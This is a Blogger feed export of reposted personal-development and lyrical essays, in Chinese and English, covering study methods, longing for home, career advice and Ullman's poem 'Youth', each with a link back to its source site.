tag:blogger.com,1999:blog-63228007003349876672024-03-05T06:45:29.721-08:00谷雨如丝润一麦Unknownnoreply@blogger.comBlogger106125tag:blogger.com,1999:blog-6322800700334987667.post-60135337549901521212015-11-20T04:29:00.003-08:002015-11-20T04:29:58.767-08:00五种有效的学习方法 - 方法比努力重要<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWZoTvMYtvDum9LJiq6pM1NejusniaW-EX_97AUR9_zvdtaiDNtfdYCYL33_fJUbSZhsbSZa5G2FoVTek3IxazhtnYBeZW2-UKXdrAUEQK_XSjhUGAJkVczYoh-sjHWss7jey1G4GeFYt-/s1600/study.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWZoTvMYtvDum9LJiq6pM1NejusniaW-EX_97AUR9_zvdtaiDNtfdYCYL33_fJUbSZhsbSZa5G2FoVTek3IxazhtnYBeZW2-UKXdrAUEQK_XSjhUGAJkVczYoh-sjHWss7jey1G4GeFYt-/s400/study.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
1 目标学习法<br />
掌握目标学习法是美国心理学家布卢姆所倡导的。布卢姆认为只要有最佳的教学,给学生以足够的时间,多数学习者都能取得优良的学习成绩。<br />
教
学内容是由许多知识点构成,由点形成线,由线完成相对独立的知识体系,构成彼此联系的知识网。因此明确目标,就要在上新课时了解本课知识点在知识网中的
位置,在复习时着重从宏观中把握微观,注重知识点的联系。另外,要明确知识点的难易程度,应该掌握的层次要求,即识记、理解、应用、分析、综合、评价等不
同层次,最重要的就是明确学习重要目标,即知识重点。有了目标能增强我们学习的注意力与学习动机,即为了这目标我必须好好学习。<br />
可见,明确学习目标是目标学习法的先决条件。目标学习法的核心问题,是必须形成自我测验、自我矫正,自我补救的自我约束习惯。对应教学目标编制形成性检测题,对自己进行检测,并及时地反馈评价,及时矫正和补救。<br />
<br />
学
习目标与人生目标不同,它比较具体,可以在短时间内实现。它可以使我们比较容易地享受成功的欢乐。增加我们的信心。因此,目标学习法也是成功教育的主要
策略之一,同时,实现学习目标也是实现人生目标的开始,只有使大小、远近目标有机的结合,才会避免一些无效劳动的发生。<br />
<br />
<br />
2 问题学习法<br />
带着问题去看书,有利于集中注意力,目的明确,这既是有意学习的要求,也是发现学习的必要条件。心理学家把注意分为无意注意与有意注意两种。有意注意要求
预先有自觉的目的,必要时需经过意志努力,主动地对一定的事物发生注意。它表明人的心理活动的主体性和积极性。问题学习法就是强调有意注意有关解决问题的
信息,使学习有了明确的指向性,从而提高学习效率。<br />
<br />
问题学习法要求我们看书前,首先去看一下课文后的思考题,一边看书一边思考;同时,它还要求我们在预习时去寻找问题,以便在听课时在老师讲解该问题时集中注意力听讲;最后,在练习时努力地去解决一个个问题,不要被问题吓倒,解决问题的过程就是你进步的过程。<br />
<br />
<br />
3 矛盾学习法<br />
矛盾的观点是我们采用对比学习法的哲学依据因为我们要进行对比,首先要看对比双方是否具有相似、相近、或相对的属性,这就是可比性。对比法的最大优点在
于:(1)对比记忆可以减轻我们记忆负担,相同的时间内可识记更多的内容。(2)对比学习有利于区别易混淆的概念、原理,加深对知识的理解。(3)对比学
习要求我们把知识按不同的特点进行归类,形成容易检索的程序知识,有利于知识的再现与提取,也有利于知识的灵活运用。<br />
<br />
综观中学课本,可比
知识比比皆是,如政治内容中,权利与义务、民主与法制、物质与意识、和平与发展等等;如语文学习中,复句与单句、设问与反问、比喻与借
代、记叙与议论、实词与虚词等等;如数学学习中,小数与分数、指数与对数、奇函数与偶函数、平行与垂直等等;如化学学习中,金属与非金属、晶体与非晶体、
化合与分解、氧化与还原、酸与盐等等。对比学习法不仅可以用于同一学科内的学习,还可以进行跨学科比较,如学习政治可用语文中的句子分析法来分析政治概
念,如在学习近现代史中的民族解放运动时,又可以利用政治有关民族的基本观点,学习自然学时,可回忆一下有关语文课本中的有关科学家的传记文章,也可结合
唯物辩证法的有关原理进行学习。<br />
<br />
<br />
4 联系学习法<br />
唯物辩证法认为世界上任何事物都是同周围的事物存在着相互影响、相互制约的关系。科学知识是对客观事物的正确反映,因此,知识之间同样存在着普遍的联系,我们把联系的观点运用到学习当中,会有助于对科学知识的理解,会起到事半功倍的效果。<br />
<br />
根
据心理学迁移理论,知识的相似性有利于迁移的产生,迁移是一种联系的表现,而联系学习法的实质不能理解为仅仅只是一种迁移。迁移从某种意义上说是自发
的,而运用联系学习法的学习是自觉的,是发挥主观能动性的充分体现,它以坚信知识点必然存在联系为首要前提,从而有目的地去回忆、检索大脑中的信息,寻找
出它们间的内在联系。当然,原来对知识掌握的广度与深度直接影响到建立知识间联系的数量多少,但我们可以通过辩证思维,通过翻书、查阅、甚至是新的学习,
去构建新的知识联系,并使之贮存在我们的大脑之中,使知识网日益扩大。这一点是迁移所不能做到的。<br />
<br />
学习新知识就要想到旧知识,想到自己亲
身经历过的事,不能迷信权威,克服定势思维。把抽象的知识具体化,发挥右大脑的作用。如辛亥革命发生在1911年,
二次革命发生在1913年,护国战争发生在1915年,护法战争发生在1917年,这四个历史事件依次间隔二年,只要记住这两个历史事件的逻辑顺序,知道
其中任何一个事件的年代,就可以联想,推算出其它三个事件的年代。这是联想记忆法。<br />
<br />
读书之法,既先识得他外面一个皮壳,又须识得他里面骨髓方好。——朱熹<br />
<br />
<br />
5 归纳学习法<br />
所谓归纳学习法是通过归纳思维,形成对知识的特点、中心、性质的识记、理解与运用。当然,作为一种学习方法来说,归纳学习法崇尚归纳思维,但它不等同于归纳思维本身,同时它还要以分析为前提。<br />
<br />
可见,归纳学习法指的是要善于去归纳事物的特点、性质,把握句子、段落的精神实质,同时,以归纳为基础,搜索相同、相近、相反的知识,把它们放在一起进行识记与理解。其优点就在于能起到更快地记忆、理解作用。<br />
<br />
研究必须充分地占有材料,分析它的各种发展形式,探寻这些形式的内在联系。——马克思<br />
<br />
<br />
<br />
转载自Tetraph:<br />
<a data-mce-href="http://www.tetraph.com/blog/study/study-method/" href="http://www.tetraph.com/blog/study/study-method/">http://www.tetraph.com/blog/study/study-method/</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-64757777171152669332015-10-29T03:10:00.000-07:002015-11-20T03:13:56.596-08:00心的回归 - 这一生,我们都走在回家的路上<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEe-shm9CG2G1sB8JN1A1ncGWQyyVEFPoyCsQ8mavUKbnFXYoJN7GoJFIFc54yun_nGgvZNxwT0ivchKpbTr3NmLbqBC0PfnuyV0dzYij5Ynr2vEtSIIdT3i-WoCctyMfKqVaTqMkqeTR-/s1600/cropped-road-home1.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEe-shm9CG2G1sB8JN1A1ncGWQyyVEFPoyCsQ8mavUKbnFXYoJN7GoJFIFc54yun_nGgvZNxwT0ivchKpbTr3NmLbqBC0PfnuyV0dzYij5Ynr2vEtSIIdT3i-WoCctyMfKqVaTqMkqeTR-/s400/cropped-road-home1.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
这一生,我们都走在回家的路上。<br />
<br />
<br />
回家,永远是我心中无法解开的情节。无论身在何处,我的心永远是朝着家的方向,它在一角默默的绽开,灯火阑珊处映射着家的绚丽。<br />
<br />
<br />
家,也将是一个多么令人心痛的字眼。离家之后才明白对家是多么的不舍,张开的翅膀听到它也会微微一颤,纵然身躯多么矫健,臂膀多么宽厚,在家的面前也将是脆弱无力。<br />
<br />
<br />
夜
深,烟花升,灯火明。多少人已经离开了家,多少人将要离开家,又有多少人想要回家。多少人在异地不经意的抬头,看见烟火绚烂的绽放,失落感油然而生,可
为了所谓的梦想,多少人无可奈何,百感交集。家里的灯火或许没那么美丽,烟花或许没那么灿烂,但是自己的内心仍能感受到家的体温,它像母亲的双手般温暖,
父亲的教导般纯朴,亲人的劝告般温馨。它流在你的血液里,扎根在你的骨髓中。它无时不刻不在提醒你,让心回家。<br />
<br />
<br />
公益回家的广告,煽动了我
们多少泪点,也唤醒了我久已沉睡的心。父母在,不远行。直到今天我才大彻大悟,这句话说了两千年,可有多少人才能明白它的真谛?
有多少人能按照它的旨意前行?起码我不是,以前不是。我不得不悔恨自己,悔恨当初。曾经一心想飞,想离家远远的,越远越好。抛开一切,逃避束缚,为了所谓
的梦想,可怜的父母,在所谓面前低人一等,而他们没有半句怨言,依然在静静的支持你,鼓励你。背后的辛酸与泪水你看不到,你看到的只是灯红酒绿,你看到的
只是金钱与权力,你看到的只是名声与羡慕!你眼里只有你所谓的成功,只有你的片刻的掌声与欢笑。你没有看到,父母的孤独与寂寞,他们什么都不需要,只要你
的陪伴与电话!他们只想要一个完整的你,一个健康快乐的你。有时候他们只是想见你一面,想听听你的声音,这你都不能满足,又怎能谈成功?<br />
<br />
<br />
我
欠他们的太多了,多的一辈子都无法弥补,这是一种罪,天大的罪,罄竹难书。我们太吝啬了,小气到在家就不曾说句感激的话,不曾多一些时间多陪一陪他们。
而我们呢,很忙,真的很忙。我们忙什么了?睡觉?玩电脑?玩手机?聚会?是啊,是挺忙的。我们给了他们多少时间?一日两餐吗?<br />
<br />
<br />
内疚是失败
者 的独白,但却是良心的谴责。当车票买到手的那刻,我知道我对父母的歉疚只能加深而不能弥补了。远行,我甚至有些反感了,多少次我扪心自问,按
照这样的走法,与父母的相处机会可是真的屈指可数了。相信很多远行者都是一年回家两次,按照这个算法,我们回家的次数还能过百吗?<br />
<br />
<br />
永远不会
忘记,我们是中国人,百善孝为先。如果我连最基本的都做不到,我就是一个一事无成的人,一个不完整的人。每次离家我都会躲避母亲的眼神,那是失
望,期望,坚定的汇总。仔细想想,我最基本的责任都没尽到,其他还有什么可谈。家,永远是我们梦境也是我们自己创造的,是我们大脑存在的凌乱的记忆碎片在
梦中被一种无形的力量加以整合与编造,使之存在短暂的真实感,并伴随着醒来渐渐消退。的港湾,心中没有家的人永远是一个失败者。<br />
<br />
<br />
无论多久,它总会在梦中出现,不论多远,我们不会停止奔跑的脚步,朝着家的方向。将来的将来,我不再迷茫,不再没有目的的追求,不走没有结果的旅程。家,永远是我的落脚点,让心回家,回到父母身边,弥补欠下的债。<br />
<br />
<br />
<br />
这一生,我们都走在回家的路上。<br />
<br />
<br />
<br />
<br />
<br />
<br />
转载自蝶比翼美文:<br /> <a data-mce-href="http://diebiyi.com/articles/essay/home-back/" href="http://diebiyi.com/articles/essay/home-back/">http://diebiyi.com/articles/essay/home-back/</a><br />
<br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-34648435501783605712015-10-14T03:32:00.000-07:002015-11-20T03:40:26.548-08:00Five Important Work Suggestion - Very Useful for Success<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwPvsXCrtFwtc9rng2Sc80ORJUQB8AYMOCFAPEb7D969jhyveqVidEYwe8j0pCOjN2zsm_MRcEjDPtIkHIRYvESyBHy0e-5_cO-84Lo-okY6IBkk1PzXYIepdq3JEnS-y1rmxuPd-GaG_J/s1600/work.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwPvsXCrtFwtc9rng2Sc80ORJUQB8AYMOCFAPEb7D969jhyveqVidEYwe8j0pCOjN2zsm_MRcEjDPtIkHIRYvESyBHy0e-5_cO-84Lo-okY6IBkk1PzXYIepdq3JEnS-y1rmxuPd-GaG_J/s400/work.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This post is in partnership with Time. The article below was originally published at Time.com<br />
<br />
With
so much career advice floating around the interwebs, some of it is
bound to be poor. Luckily we here at Levo don’t just trust the
haphazardly doled-out opinions of self-appointed “leadership experts”
and other dubious characters. We go straight to the top—men and women
who have worked their way to massive career success — and ask them. What
strategies actually worked for them? Which career buzz phrases should
be ignored completely? Here are a few pieces of career advice that you
should never follow.<br />
<br />
1. “Always have a five-year plan.”<br />
Haven’t
you heard? Five-year plans are out, pivoting is in. Having tangible
goals is awesome and necessary, but trying to plan out the next five
years of your life is neither. The best opportunities are often those
that you don’t see coming. Being too stuck to your “five-year plan”
inhibits you from taking opportunities as they arise, and pivoting in
new directions.<br />
<br />
2. “Don’t be a job hopper.”<br />
There
are worse things to be. Namely, the quiet loyal workhorse who never
leaves or makes the money she deserves. It’s a new economy people, job
hopping is becoming the norm. These days, employees who stay in
companies for longer than two years earn 50% less over their lifetimes.
So yes, be gracious and respectful to each and every one of your
employers, but certainly don’t stay in a position for fear of being
labeled “a job hopper.”<br />
<br />
3. “Follow the money.” / “Just do what you love and the money will follow.”<br />
Equally
bad advice, from opposite ends of the spectrum. Following the money
with complete disregard for your interests is a surefire path toward a
soul-sucking career doing something you hate. It may not even be the
best financial move in the long term. On the other side of that coin,
doing what you love with the expectation that financial success will
miraculously follow is naive and ridiculous. As Kate White always says,
think about where your interests and talents intersect with the greatest
potential for financial success, and head toward those points of
intersection.<br />
<br />
4. “Don’t be too grabby. Let your work speak for itself.”<br />
This
is the kind of advice your Middle Eastern grandfather who owned a small
business 40 years ago might give you (not from personal experience or
anything). Even if it means well, it is just not true. Remember that
episode of New Girl? Jess wants to be vice principal of her school: “I’m
just hoping, you know in a few years, I’ll have enough experience that
Dr. Foster will consider me for Vice Principal.” Coach asks, “Why don’t
you just ask for it?” Jess says, “You can’t just ask for a promotion,
you know, you have to earn the promotion with years of hard work.” Coach
laughs. Please, don’t be Jess.<br />
<br />
5. “Don’t waste time applying to jobs you know you won’t get.”<br />
We
just published a great piece from the Personal Branding Blog that
addresses this very topic. Just because you think a particular job is a
reach or you’re not the ideal fit, that doesn’t mean you shouldn’t
apply. Within limits of course—don’t start applying for wedding
photographer assistant positions if you want to be a pharmacist (unless
you’ve always cultivated a secret passion for photography of course).
Every job you apply to is an opportunity to tighten up your resume, hone
your interview skills, and build confidence, which is never a waste of
time.<br />
<br />
<br />
Article From InZeed:<br /><a data-mce-href="http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/" href="http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/">http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-23595835486415340062015-09-10T04:40:00.000-07:002015-09-10T04:40:00.729-07:00浮生半日 烟火红尘 一念清净 烈焰成池<wbr></wbr><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV6fCXQPYsJqmv467cM0RK_21GaHHHJqFWHjc-hzRZr2AgljLAzmjib2c4PG36rDyyDa_NXicTVQmHQrn2ConBfrO2RVq98Xofi8A8r05S8EhplSxNOESsTnuXXOdrpwZByi_vgM13oMFv/s1600/BeautifulNature3-610x320_diebiyi.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV6fCXQPYsJqmv467cM0RK_21GaHHHJqFWHjc-hzRZr2AgljLAzmjib2c4PG36rDyyDa_NXicTVQmHQrn2ConBfrO2RVq98Xofi8A8r05S8EhplSxNOESsTnuXXOdrpwZByi_vgM13oMFv/s400/BeautifulNature3-610x320_diebiyi.jpg" width="400" /></a></div>
<div>
<br /></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
“半生漂泊,每一次雨打归舟”,浮生半日,烟火红尘,也说饮鸩不止渴,然终是一杯清茶洗过尘心,弦拨心上,山岚依如茶杯上的云烟。谁是谁别了三生三世的影,两吊钱赎回的旧梦遗风,谁还醉唱挽歌浅斟一盏薄情,清酒一壶就醉生梦死了时光。<br />
<br />
苦雪烹茶安然度过世界末日,许多人和事都重生了,我想我也会忘了那只乌鸦在末日的方舟上几番徘徊,飞过无痕,狮子却说爱我就让全世界都知道。爱是一
场荨麻
疹,容我再洗净铅华,待千帆过尽。这一别两宽心,各生新欢喜。太阳升起的时候,举目四方宿命繁星。如陈亦迅唱那首苦瓜:当你干杯再举箸,突然间相看莞尔,
某萧瑟晚秋深夜,忽而明了了,而黄叶便碎落。<br />
<br />
时间很短,天涯很远。自当终有弱水替三千。今宵请你多珍重,方配这半世流离醉笑三千场离散河两岸,江湖相忘。这杯烈酒下肚,碎一地离殇亦无需你刻意唱一曲骊歌摆渡,烟草的味道,风会把它稀释掉。<br />
<br />
麦田几次成熟容我焚香安静的难过,心怀感恩,祈福。<br />
<br />
诗经里说:一月气聚,二月水谷,三月驼云,四月裂帛,五月袷衣,六月莲灿,七月兰浆,八月诗禅,九月浮槎,十月女泽,十一月乘衣归,十二月风雪客。微雨突袭的三月桃花春柳拂面的桥头,可有良人云里衣衫?四月裂帛裂了思,陌上花谢了,可徐徐归么?<br />
<br />
孰说世间所有的相遇都是久别重逢,亦记得某年某月某日小北说:我可以留着你,也可以放任自由。<br />
<br />
<br />
<br />
<br />
期:浮世流光,惜物恋人。一念清净,烈焰成池。<br />
<br />
寸寸云文不成文,如果是伤了春悲了秋,写一路醉,哭一路歌,扯断心神,终亦忘却寒山。诗人,你如山的行囊里数<br />
<br />
不尽的人间烟柳可载得起这坛醉生梦死?<br />
<br />
烟水悠悠,淡酒一盏,十二月风雪客,同年同月同日刮着同个方向同样度数的风,都已不是当时。我想我是在待着一位故人,他还没有来,也许在来的路途上,我且沏好了茶,待着,如此 就好。<br />
<br />
<br />
<br />
<br />
转载自蝶比翼美文:<br />
<a href="http://diebiyi.com/articles/essay/shishi/">http://diebiyi.com/articles/essay/shishi/</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-22935400892723983062015-08-31T04:02:00.000-07:002015-08-31T04:02:37.855-07:00Youth - Time of Beautiful Emotion<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuQ0svHOGK2bOgm09zuJm9FOeR7lH2cLbltCLHlssfVNLnT7jf-ZRYJEx_7gfW-OWWcY07BZQAFAF74VWaa8sUU_vE4lDUle3-_Nd3SfoMXegR_e4X6LzNwt64NmCC4mHM2DNJmvOtMZ5x/s1600/marguerite-729510_640_inzeed.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuQ0svHOGK2bOgm09zuJm9FOeR7lH2cLbltCLHlssfVNLnT7jf-ZRYJEx_7gfW-OWWcY07BZQAFAF74VWaa8sUU_vE4lDUle3-_Nd3SfoMXegR_e4X6LzNwt64NmCC4mHM2DNJmvOtMZ5x/s400/marguerite-729510_640_inzeed.jpg" style="cursor: move;" width="400" /></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br data-mce-bogus="1" /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Youth is not a time of life; it is a state of mind; it is not a matter of rosy cheeks, red lips and supple knees; it is a matter of the will, a quality of the imagination, a vigor of the emotions; it is the freshness of the deep springs of life.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Youth means a temperamental predominance of courage over timidity, of the appetite for adventure over the love of ease. This often exists in a man of 60 more than a boy of 20. Nobody grows old merely by a number of years. We grow old by deserting our ideals.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Years may wrinkle the skin, but to give up enthusiasm wrinkles the soul. Worry, fear, self-distrust bows the heart and turns the spirit back to dust.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Whether 60 or 16, there is in every human being’s heart the lure of wonders, the unfailing appetite for what’s next and the joy of the game of living. In the center of your heart and my heart, there is a wireless station; so long as it receives messages of beauty, hope, courage and power from man and from the infinite, so long as you are young.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
When your aerials are down, and your spirit is covered with snows of cynicism and the ice of pessimism, then you’ve grown old, even at 20; but as long as your aerials are up, to catch waves of optimism, there’s hope you may die young at 80.</div>
